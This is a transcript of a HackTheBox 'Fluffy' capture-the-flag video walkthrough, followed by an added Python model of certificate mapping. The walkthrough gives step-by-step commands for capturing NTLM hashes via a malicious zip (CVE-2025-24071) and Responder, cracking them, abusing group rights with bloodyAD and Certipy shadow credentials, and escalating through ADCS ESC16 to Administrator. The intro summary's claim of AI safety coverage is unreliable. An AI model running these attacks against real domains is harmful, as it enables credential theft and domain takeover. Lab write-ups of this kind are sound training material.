HackTheBox - Fluffy
Key Takeaways
The video demonstrates a hack of the Fluffy system on HackTheBox using various tools and techniques such as BloodHound, Hashcat, and Metasploit to exploit vulnerabilities and gain access to the system. The video also covers topics related to AI safety and cybersecurity, including certificate-based authentication and Active Directory exploitation.
Full Transcript
What's going on YouTube? This is IppSec doing Fluffy from Hack The Box, which is an easy assumed-breach Active Directory box. Well, easy as long as you keep your tools up to date, as the priv was ADCS ESC16. I know I read off a bunch of letters. That's Active Directory Certificate Services escalation number 16. And that's only available in recent versions of Certipy. And these certificate exploits are very hard to find manually. So, if you didn't update Certipy, you're just spinning your wheels for a long time. The box starts off with a set of credentials. You can find a PDF on a file share that indicates it's vulnerable to a recent CVE which would cause Windows to make an SMB request upon unzipping a specially crafted zip file. So you create that, upload it to a share, get NTLMv2 credentials which you can crack and gain access to an account that gives the ability to add itself to a group and can take over a few service accounts. One of these accounts we can perform ESC number 16 to get root. So with that being said, let's just jump in. As always, we're going to start off with an nmap. So -sC for default scripts, -sV enumerate versions, -vv for double verbose. This gives us things like the TTL. -oA output all formats, put in the nmap directory and call it fluffy. And then the IP address of 10.10.11.69. And I have a typo there. So I'm just going to fix it. This can take some time to run. So I've already run it. Looking at the results, we can see 10 ports are showing as open, right? The first one is going to be DNS on port 53. It's Simple DNS Plus, which is the default banner for Active Directory. And I always just scroll down, look at LDAP. And we see there is a domain, fluffy.htb. So I'm going to go ahead and add this to my hosts file. Also DC01. We have the fully qualified domain name right there. So let's do sudo vi /etc/hosts. Then we can add 10.10.11.69 fluffy.htb. Let's do dc01.fluffy.htb. And I'm just going to add dc01 as well.
The three names that can be applicable to this. Right. So, let's look at what else we have here. Let's see. Kerberos, the LDAP, it's showing that we do have a certificate authority on this box. So, we may want to run like Certipy, things like that, to just look at certificate configuration. I'll probably do that later on because if we did all the recon possible for every single box, everything would take a while, right? But normally when I see that, I normally run Certipy and just see what certificates are there, what type of enrollment rights, things like that, right? Let's see. We have LDAP. Again, this is going to be LDAPS. The main thing I'm looking for right now is like some type of web server or something like that. We can see the box is 7 hours different from us. So if we do anything Kerberos related, we probably should sync our time, right? Let's see. More LDAP again. Just kind of skipping over that. The clock skew and this host script results. So nothing really there, right? So this is an assumed-breach box. So we start off with a set of credentials. So I'm going to add this to a creds.txt just so I have them and don't have to keep going back to the page. So let's do creds.txt. Put this in. And we will add this password. Okay. So to start off, I always like just using NetExec. So, do netexec smb. Let's do dc01.fluffy.htb. I don't know why I keep saying fluffly, but there we go. -u j.fleischman -p. I think I stole my clipboard, right? And since it has a special character, I'm just going to put that in single quotes. And what I want to make sure now is we just have the credentials correct, right? And that we can access the box. There we go. It took a little bit, but we do have a successful authentication, right? So, one of the things I like doing is just testing for Kerberoasting right off the bat. So, we can say ldap and then say --kerberoasting output.txt. And then we can also run RustHound.
I like doing RustHound over, what is it, like the BloodHound Python collector, because it collects a lot more things, specifically certificate data. So, I just like using RustHound, right? Let's do -d fluffy.htb. I typoed that again. -u j.fleischman. Hopefully, I did that correct. And put that password in. And this has errored because we have a clock skew. So, let's do sudo ntpdate and then fluffy.htb. That should set my time correctly. Run this again. And let's see, LDAP result. I wonder if that was also time related. We probably just typoed the username. So, let's do cat creds.txt. Let's go ahead and grab this and we can paste this in. There we go. So, RustHound is working. We do have some Kerberoast creds. So, if I cat output.txt where it's saved, we have a few, like winrm_svc. Let's see what else we have. Going up, ldap_svc and ca_svc. So we have the certificate service, LDAP, and WinRM. So I'm going to just scp this over to the Kraken. And this is just a box on my network where I run hashcat out of. You can do it on your localhost. I just wouldn't recommend doing it in a VM because VMs would slow down the hash cracking process. Let's see. Let's go into hashcat. I'll copy it into hashes. And I'll call this fluffy.kb. I guess that seems fine. cd hashcat. And let's do ./hashcat. I cannot type today. Put that there and then /opt/wordlist/rockyou.txt and let's see if we start cracking anything. We need to specify the hashcat mode. This is going to be a Kerberos 5. So I'm just going to do -m 13100. Let that go. And we do have a bunch of files from BloodHound. So let's go cd /opt/bloodhound-server, docker compose up -d to start this service, and none of these hashes cracked. So it bought us nothing. We do have BloodHound running now. So I'm going to do localhost:8088 because that's where I have BloodHound configured to run. The default is 8080, but Burp Suite likes listening on that port.
So I always change my BloodHound to be 8088 just so those two don't conflict. Right. So I'm going to now go and ingest data. So we can go Administration, Upload Files. Let's go to ippsec/htb/fluffy and copy all of these. I could have added like the -z for zip and then just had one big zip. That's probably the easier way to do it, but I did not. So it is ingesting. A video I would recommend if you wanted to run Certipy early would be Certipy jq, I guess, if you go to ippsec.rocks, and I'd go to watch this video, right? Because the user we have isn't going to be vulnerable. So the exploit doesn't really stick out in the Certipy results. In this video we talk about using jq to just show odd configurations of certificate data. I think specifically we're looking for any user that has enrollment rights that is non-default, right? So I would go look at this video, study up on that if you want to run Certipy when you first get a user account, and you can examine certificate information that way very easily. It says it is complete. So let's go down to Explore and then I'm just going to search for the user I have, which is that j.fleischman. And let's see. We can click, and I like looking at Member Of. We are Users, Domain Users, so no interesting groups. Outbound Object Control, we can see what data we have. We can enroll certificates. If we did the certipy command with -vulnerable we don't really find anything. We could mark our user as owned and then go over to a Cypher query and there's probably going to be like a shortest path from owned. Shortest path from, let's see, owned objects to Tier Zero. I think if we run either of these, nothing really happens. I think that's actually erroring, which is odd. There we go. Let's see what this shows. I'm a member of Domain Users, which is a member of Users. So this gives us nothing. One thing we did not do is look at the, what is it? Let's go back to NXC, the file shares, right?
So, I can change this back to smb. And if I do a --shares, we can see if we have access to any of the file shares. We could also use like smbclient for this as well. I think it's -U j.fleischman like this. And then, what is it? //fluffy.htb. I want to say it's a -L. Do we do it on this side? Maybe user is a capital -U like this. Wow. I am... There we go. So we can paste this password in and this will show near the same thing, right? We see ADMIN$, C$, IPC$, IT. I like using CrackMapExec because it tells us the permissions, right? We have read/write over the IT directory. So if I get rid of this and just do IT, we should be able to access it. And it's worth noting, if this was a file server, not a domain controller, this authentication would fail because I'm authenticating as WORKGROUP. The domain controller has no real concept of a domain, oddly enough, like local accounts work for it. So that's why this is working. But if it wasn't the domain controller itself hosting it, I would have to specify the domain, right? So I think if I do fluffy.htb and yeah, that should work. Do I have the password? Do not have the password. Let's now put this in. Copy. Paste. So, this is the better way to access it. Right. So, now if I just take this -L off, we could access the file share. If I do a dir, we can see we have Everything, KeePass, Upgrade_Notice. So, I'm just going to get the PDF and then let's just open this PDF. Upgrade_Notice. Did I not save it there? Where is my directory? Oh, I'm in bloodhound-server. /opt/bloodhound-server/Upgrade_Notice. Copy it here. And now I can just open this. So looking at it, we have "multiple high impact vulnerabilities have been publicly disclosed". So if we start scrolling down, we can see which vulnerabilities it's talking about. They don't really give any details. So we could go and just go to like CVE Details and then search each one like this and try to figure out what it is.
But I don't think this page actually tells you like if exploits are available, things like that. So what I honestly do is just Google like "GitHub PoC" for the CVE first to see if I can find a quick exploit on GitHub, right? And this isn't finding anything, or did this... oh, this is just the Avon feed. I'm just going to go over to Google. I don't like DuckDuckGo for some reason. I think the search results aren't as good as Google for some reason. And that's actually doing the same thing, but my eyes are used to seeing this page much more. And I do a search. Nothing's highlighted. So, I don't think this CVE has anything interesting. We do this one. Let's change out the CVE. Put this in. And I expected like my browser to highlight things. I guess it didn't. We do have an msfvenom payload for this. So, there are various PoCs. I don't see the one I'm used to seeing. Let's see. This is also a good one. So, this is going to be a Metasploit thing. I don't like this page because it's not telling me like a good blog post that has a lot of information, but it's pretty easy to figure it out based upon the description, but this one has this blog from CTIM. It's a domain, but it's a really good blog post about it, right? Essentially, if we have a zip file and we put a specially crafted .library-ms inside of that, when Windows unzips it, it's going to hit this URL. And because Windows likes doing automatic login, if we point this at our box, then Windows will automatically attempt to log in with the user that is logged in, right? And that's how we get an NTLMv2 hash and we can crack it, right? This is mainly going to be a vector where you have to be on the same network, or at least the same company network, because when Windows sees an SMB path from a non-local address, so that's one that's not like 192.168, 172.16, 10.10, or something that's actually 10.0.0.
So, if it's not one of those RFC 1918 addresses that are local, it's not going to automatically attempt to log in, at least to my knowledge. So, this would not work if we just crafted a zip file, had something listening on the internet. We couldn't just steal hashes, right? You have to be on the same local network. That's not the same broadcast domain, which would be like 192.168.1.something in this example. It's just the same network that's also a local address. Hopefully that makes sense. But I can't copy and paste this screenshot, so I'm going to use the GitHub PoC because it makes it easy. But essentially, all you're doing is creating a zip file, right? We can look at this poc.py. And we see it's starting to create that XML. We have the IP address here, and it's just going to compress a zip file for us, right? So, let's go ahead and clone this. So, I'm going to do a... let's just do a new window. git clone on this. Go into the CVE directory. python3 poc.py. Enter my file name. I'm going to call it malware.zip. Obviously, you wouldn't do that, but my IP address is 10.10.14.8. And now, all we have to do is set up Responder. So, let's do sudo responder -I tun0. And I think that's all we have to do, right? We have an SMB server on, so I don't think we have to specify any other options. I hope so. Do I have an SMB window open? I don't. We can, but let's go cd htb/fluffy before I do that. smbclient. Let's copy this password. Capital J, paste. There we go. dir, and I'm going to put malware.zip and see if anyone clicks it. I probably have it in that CVE directory. So, let's copy that. ls CVE... 7z l. I wonder if it just... Okay, so it's malware.zip, library-ms. So, that's the file name. That's fine. So move this here. put exploit.zip. So we have now put it in and we just want to wait to see if anyone makes a connection to us. Right. If I do ss -lntp | grep 445, we can see I am listening on tun0, which is 10.10.14.8, on 445.
So hopefully someone will make a connection within... I'm going to give it 2 minutes. So I can do sleep 120 and then I'm just going to take a look at this to make sure nothing happens. We do have an email address. So, maybe we have to use something like swaks and email the user, but I didn't see any like SMTP in my nmap report. So, I don't think it's going to be that type of thing. So, I'm going to pause the video and we'll resume when this sleep is finished. Literally, the second I clicked stop recording, we did get a hit. So, we have the NTLMv2 hash right here. So, I'm going to go ahead and grab this. Then we can say ssh kraken, cd hashcat, vi hashes... we called it fluffy dot... we'll do fluffy.ntlmv2. Paste this in. ./hashcat the hash /opt/wordlist/rockyou.txt and we'll see if this ends up cracking. Right. And while that starts, I'm going to copy this username. We can close this PDF out. We can go back to BloodHound and pull up this user because if we get the user, what does this give us access to? That's my main question. So, we can start this. I'm just going to go ahead, mark as owned. And if we don't crack it, then I'll probably unmark it. But let's see. We're a member of three groups. So if I look at this, we're a member of Service Account Managers. So that is what's different currently. If I look at Outbound Object Control, we can see I'm a member of Domain Users. We saw that before with the last user, but we can see Service Account Managers has GenericAll over Service Accounts. So that means we can add ourself to this group. So I'm just going to go ahead and also mark this group as owned. And then let's see what we can do with this group. So if I click on it, then I'm going to go to Outbound Object Control. And we have GenericWrite over three groups: CA, LDAP, and WinRM. Since we have GenericWrite, this is going to allow us to update the password for these accounts.
I'm going to use a shadow password, I think is what it's called. It's essentially configuring certificate login for these accounts. So that's going to enable me to gain access to the account without updating the password. So there's less chance of breaking services, right? Whenever you can use the shadow one, I'd highly recommend it because if you just update the password, if anyone goes to use it, then it breaks, right? Like if they're using this LDAP service account in applications and they're using that as like the bind so the application can authenticate against Active Directory. You change that password, you're creating a huge outage. So that's why I'm going to avoid that. Looking at hashcat, we have recovered one out of one. I'm just going to delete this word list and we'll do a --show and we'll get this password. Right, p.agila, and that's prometheusx-303. So let's go ahead, stop Responder. I'm going to do vi creds.txt. We can say p.agila. Put this password in. And then I'm just going to do nxc fluffy.htb -u p.agila -p like this. Just make sure the credential works. Give it a second. I don't know why this is taking its time, but we do have the credential. So, let's go ahead and take over these accounts. You don't need the WinRM. This is going to be where user.txt is. So, that's the one I'm going to start out with. But the main step is going to be the CA service. So, we're going to take over both of these accounts. So, the first step is we have to add ourself to that group, right? Let's do Pathfinding. I'll copy this start node, that, and then the end node is going to be winrm, and this will really easily put this path in a visible format. Right? So we're a member of this. Let's go ahead and make it so it's a bit easier for you to see. So I think if I do this, that'll let me zoom and we can see the entire path, right? There we go.
So, since we're a member of this, we're going to add ourself to the Service Accounts group and that's going to allow us GenericWrite over winrm_svc. And essentially that's how we get the shadow credential. So, the first step is to add ourself to the Service Accounts, and I'm going to use bloodyAD to do that. bloodyAD. And we can say -u p.agila -p. We don't have that password in my clipboard anymore, do we? Nope. So let's go ahead and copy this, paste. And then what do we need next? The domain, fluffy.htb. The host is going to be 10.10.11.69. I don't know if I need that. I'm just in a habit of supplying it. And I typoed this domain differently. Man, I just cannot type that. So we're going to do add groupMember "Service Accounts" and then the user we want to add, which will be ourself, p.agila. And we have a typo somewhere. I'm guessing add groupMember has a casing. Yeah, the M is capital. I really hate that about bloodyAD. The commands are case sensitive. So now we have added ourself to that group, which means we'll be able to use Certipy to create the shadow credential. So certipy shadow, -u p.agila@fluffy.htb, -p prometheusx-303. We'll do -account winrm_svc -dc-ip 10.10.11.69. Let's see, we missed something. What did I miss? Typo and typo. Did I say I'm having problems typing today? So we have that. I'm going to go ahead and just copy this command because it does take a second for that to work. And while that does, I'm going to request something for the CA service as well. So, we'll have both of these. This is going to give us the TGT hash for these accounts, right? So, we have the NTLM hash here. vi creds.txt. We'll do winrm_svc. Paste that in. ca_svc. And we will paste this in. Okay. Save. And then we could just do like evil-winrm -i 10.10.11.69 -u winrm_svc. I want to say it's a -H, right, is that hash. There we go. So this is how you could get user.txt. I think that's in Desktop like that.
So that would be that. But the next step is abusing the certificate account, right? So if we just looked at ca_svc, do this and then we'll do kind of the same thing. Look at our Outbound Object Control. See what this account can do. We have GenericWrite over two users. We can enroll in those certificates. We can also enroll in the CA, but nothing really stands out here. And BloodHound currently doesn't show the ADCS, I think it's ESC9 or 16. I think it's the 16 attack. BloodHound doesn't currently show it. So that's why we don't have it in this interface. And at the time of release, you had to grab a version of Certipy from like one or two weeks in order for it to show up in Certipy. So this was a relatively new attack when the box released. But if I do certipy now, we can do certipy find -u ca_svc -hashes. Do I have this hash? I think this is the right... No, that's the winrm one because I just logged in. Let's go ahead and grab this hash. There we go. So, we have the hash. We want to specify the CA, which is FLUFFY-DC01-CA. So, we can say FLUFFY-DC01-CA. I think I typed that right. That looks good. And then after this, what do we need? -dc-ip 10.10.11.69 -vulnerable. Actually, I don't specify the CA here because it's going to look at everything. Can I though? No. I think that's all I need. There we go. So, it's connecting remote registry. And once this finishes, it should highlight the vulnerable certificates. I think Certipy now by default just puts it into an output file. So, we'll just be able to read that and then see what we have. Web enrollment, I don't know if... that's probably because the web server is not online. So we have written to Certipy. So let's go and cat this 203 and we'll do .txt. Here we go. So we have ESC16 because the security extension is disabled. This is going to be very similar to the Certified video, which was ESC9.
The difference between ESC16 and ESC9 is ESC16 is configured on the certificate authority itself. So all certificates are vulnerable. ESC9 is on the template itself. And because our account is a member of Certificate Publishers, that's what's going to enable this, right? If we ran Certipy from any other account, it wouldn't show as vulnerable because that account is not a member of Certificate Publishers. We could also be a member of Administrators, Enterprise Admins, but if we were, then we wouldn't have to use this exploit. But essentially, ESC9 and 16 allows the security extension... it's a weak mapping in Active Directory. And by that I mean it's going to trust the user principal name in order to map an account. I want to say the strong mapping requires the SID of that user, the like S-... that long unique name. It's just a more secure place to put it. Right. So we'll show this in a minute. Let's see if I can quickly find a blog post for you to read. It's probably going to be the Certipy wiki. So I would highly recommend just reading these if you want more information, but we'll go ahead and exploit it and hopefully it makes sense as we go through it, right? So let's go ahead and do this. So what we have to do first is update the user principal name for an account, right? And we could do that from the p.agila account, right? Because that's the one that had the GenericWrite. Right. So if I went to Pathfinding, is this still here? Let's do p.agila. This GenericWrite. Come on. Right? Because we have write access over these accounts, we can update the user principal name. So I'm going to update the user principal name for the CA service to be administrator. And then we're going to request a certificate. In that certificate, it's going to say the subject alternative name is administrator. Then when we use that certificate, it's going to map to that administrator user and let us in as them. So that is the attack in a nutshell.
So, if it doesn't make sense after watching the video, I'd highly recommend going to the Certified video because I also do the very similar attack there. So, what I'm first going to do is, let's see, let's do a certipy account -u p.agila. The password, let's do cat creds, this, put this in, -dc-ip 10.10.11.69. We'll do -user ca_svc read so we can see what the current user principal name is. It is going to be ca_svc@fluffy.htb. It's also worth noting, if we were doing it to an account that wasn't a domain administrator, we couldn't have the domain here, right? Windows will treat both ca_svc and ca_svc@fluffy.htb as the same thing. If we try to update it to a UPN that already exists, we'd get a constraint violation, right? So, if you ever do this attack and you get a constraint violation, I would just change it to be either the fully qualified name, adding the domain to it, or taking the domain off of it. So let's see. We can say the account and we'll do -upn. I'll show you the error real quick. So if we do winrm_svc, what is it? winrm_svc. I think that's the account that already exists. Let's do update. This should allow it. We have to add ourself to the group because hygiene, like a script, automatically cleaned up the box. So, let's do, what is it? bloodyAD -u p.agila. Do I have that password? I do. -account. Oh no. -p prometheusx-303 -d fluffy.htb --host 10.10.11.69 add groupMember "Service Accounts" p.agila. Typo. There we go. So now when I do this, it's going to succeed, right? Because the UPN for this was the fully qualified name. If I try to update this to be @fluffy.htb, this is going to be where it errors. We have a constraint error because that is a unique field. So if you ever see that, I just swap out between the two. But we're going to change our UPN to be administrator. Administrator. Okay. So, now that we do this, now we want to request a certificate.
So, we can do certipy req and we're going to do it as the ca_svc user, -hashes. Let's go ahead and grab this hash, and then -ca. This is the FLUFFY-DC01-CA. The template, I want to say that was the User template. The UPN is going to be administrator, -dc-ip 10.10.11.69, -upn. So, this is going to request a certificate and we're going to get the UPN of administrator because that's what we set our UPN to for this user. And if I want to, we could use openssl pkcs12 -in administrator.pfx. You don't have to do this. What I'm going to do is just show what the certificate looks like. -nokeys because I don't care about the private keys. That puts it in the x509 format, which lets us dump things. -noout. This is going to hide some base64 output, and -text to make it readable. So if I look at the certificate and we look at the subject alternative name, it is administrator. So this is going to be what our certificate uses to authenticate. And if we attempted to authenticate right now, it would fail, because if we look at our ca_svc, the UPN is currently administrator, and if we'd attempt to use the certificate, it would map to this user and fail. We can show that real quick. As long as like the cleanup script doesn't fix what we just did. So, we'll do, what is it? certipy auth -dc-ip 10.10.11.69. The file, administrator.pfx. The username is administrator and the domain is fluffy.htb. There we go. So, this fails. Now, what I'm going to do is that update command again, and we're going to, let's see, was it bloodyAD I used? There we go. So, this UPN can be anything we want. I'm just going to put it back to ca_svc. And now, because the certificate for the ca_svc account, or this UPN, doesn't match that UPN, it's going to default to the domain admin and that's what's going to let us in, right? So hopefully that makes sense, right? The certificate says a UPN of administrator. Currently the ca_svc account had that UPN, so it mapped to that.
The domain administrator also had that UPN, but it just went to the ca_svc first. Once we killed that conflict, now the certificate just lets us in as administrator. Hopefully that makes sense. I don't know an easy way to explain that. But let's go evil-winrm, -i the IP address, -u administrator, -H for hash. Do this and this is going to let us in as administrator, which then we can go to Desktop and read the flag. So that's gonna be the video. Hope it all made sense and you enjoyed it. Take care and I will see you all next
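The mapping behaviour the transcript describes, as an added example that is not from the video, from Certipy or from Microsoft: a small Python model of how a DC resolves a certificate's SAN UPN to an account, why ca_svc "catches" the certificate while it holds the UPN administrator, why the same certificate lands on Administrator once the UPN is reverted, and how keeping the SID security extension together with strong certificate binding stops it. The directory, the account names, the placeholder SIDs and the certificate objects are all constructed for illustration.

```python
# Toy model of certificate-to-account mapping for the ESC16 walkthrough above.
# Constructed for illustration: the directory, placeholder SIDs and certificate
# objects are simplified stand-ins, not real AD, KDC or Certipy code.
from dataclasses import dataclass, field
from typing import Optional

# szOID_NTDS_CA_SECURITY_EXT: carries the requester's SID. ESC16 is a CA that
# omits it from every certificate it issues.
SID_EXTENSION_OID = "1.3.6.1.4.1.311.25.2"


@dataclass
class Account:
    sam: str            # sAMAccountName
    sid: str            # placeholder SID (constructed)
    upn: Optional[str]  # userPrincipalName, may be unset


@dataclass
class Certificate:
    san_upn: str        # otherName UPN in the Subject Alternative Name
    requester_sid: str  # who actually enrolled, kept for the audit check
    extensions: dict = field(default_factory=dict)


class Directory:
    def __init__(self, domain, accounts):
        self.domain = domain.lower()
        self.accounts = {a.sam.lower(): a for a in accounts}

    def set_upn(self, sam, new_upn):
        # userPrincipalName must be unique; reusing one is the constraint
        # violation the video hits when trying winrm_svc@fluffy.htb.
        for other in self.accounts.values():
            if other.sam.lower() != sam.lower() and (other.upn or "").lower() == new_upn.lower():
                raise ValueError(f"constraint violation: {new_upn} is set on {other.sam}")
        self.accounts[sam.lower()].upn = new_upn

    def find_by_upn(self, upn):
        # Explicit userPrincipalName first, then implicit sam@domain, then a bare
        # sAMAccountName. That order is why ca_svc "wins" while its UPN is
        # literally "administrator".
        key = upn.lower()
        for acct in self.accounts.values():
            if acct.upn and acct.upn.lower() == key:
                return acct
        name, _, realm = key.partition("@")
        return None if realm and realm != self.domain else self.accounts.get(name)


def issue(requester, san_upn, security_extension_disabled):
    # The CA side: with the extension disabled (ESC16) nothing in the
    # certificate ties it to the requester's SID.
    ext = {} if security_extension_disabled else {SID_EXTENSION_OID: requester.sid}
    return Certificate(san_upn, requester.sid, ext)


def map_certificate(ad, cert, strong_binding):
    """Return (account, reason). strong_binding models a DC enforcing
    StrongCertificateBindingEnforcement, which requires the SID extension."""
    acct = ad.find_by_upn(cert.san_upn)
    if acct is None:
        return None, "rejected: no account for that UPN"
    if strong_binding:
        cert_sid = cert.extensions.get(SID_EXTENSION_OID)
        if cert_sid is None:
            return None, "rejected: certificate lacks the SID security extension"
        if cert_sid != acct.sid:
            return None, "rejected: certificate SID does not match mapped account"
    return acct, "mapped by UPN"


def cross_identity_enrollment(ad, cert):
    # Audit check (constructed): does the SAN resolve to someone other than the
    # account that enrolled? That is the signature of ESC9/ESC16 abuse.
    acct = ad.find_by_upn(cert.san_upn)
    return acct is not None and acct.sid != cert.requester_sid


def esc16_walkthrough():
    admin = Account("Administrator", "S-1-5-21-0-0-0-500", None)
    ca_svc = Account("ca_svc", "S-1-5-21-0-0-0-1108", "ca_svc@fluffy.htb")
    winrm_svc = Account("winrm_svc", "S-1-5-21-0-0-0-1109", "winrm_svc@fluffy.htb")
    ad = Directory("fluffy.htb", [admin, ca_svc, winrm_svc])
    out = {}
    # 1. A UPN that already belongs to another account is refused.
    try:
        ad.set_upn("ca_svc", "winrm_svc@fluffy.htb")
        out["duplicate_upn"] = "accepted"
    except ValueError:
        out["duplicate_upn"] = "constraint violation"
    # 2. Point ca_svc's UPN at administrator and enroll on the ESC16 CA.
    ad.set_upn("ca_svc", "administrator")
    cert = issue(ca_svc, "administrator", security_extension_disabled=True)
    out["while_upn_held"] = map_certificate(ad, cert, strong_binding=False)[0].sam
    out["audit_at_issuance"] = cross_identity_enrollment(ad, cert)
    # 3. Put the UPN back: the same certificate now resolves to Administrator.
    ad.set_upn("ca_svc", "ca_svc@fluffy.htb")
    out["after_revert"] = map_certificate(ad, cert, strong_binding=False)[0].sam
    out["audit_after_revert"] = cross_identity_enrollment(ad, cert)
    # 4. Hardened: CA keeps the SID extension and the DC enforces strong binding.
    cert2 = issue(ca_svc, "administrator", security_extension_disabled=False)
    out["hardened"] = map_certificate(ad, cert2, strong_binding=True)[1]
    return out
```

Note that the audit check only fires after the UPN is reverted, which is why an issuance-time check of the SAN alone misses this pattern; correlating the enrollment with later UPN changes on the requester is what surfaces it.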
Original Description
00:00 - Introduction
00:52 - Start of nmap
03:15 - Running NXC with the credentials we are given and kerberoasting
06:20 - Running Rusthound, still not finding all that much
09:12 - Looking at file shares, discovering a PDF on a writable share that states the server is vulnerable to CVE-2025-24071
13:50 - Making a malicious zip file by putting the .library-ms file inside of the zip that points to our box, using responder to steal and crack the hash
18:50 - Identifying P.AGILA can add themself to Service Account Managers and take over Service Accounts
22:22 - Using BloodyAD to add ourself to a group, then certipy to use shadow credentials to obtain NTLM Hash over an account we have GENERIC WRITE to
26:00 - Using Certipy to identify and exploit AD ESC 16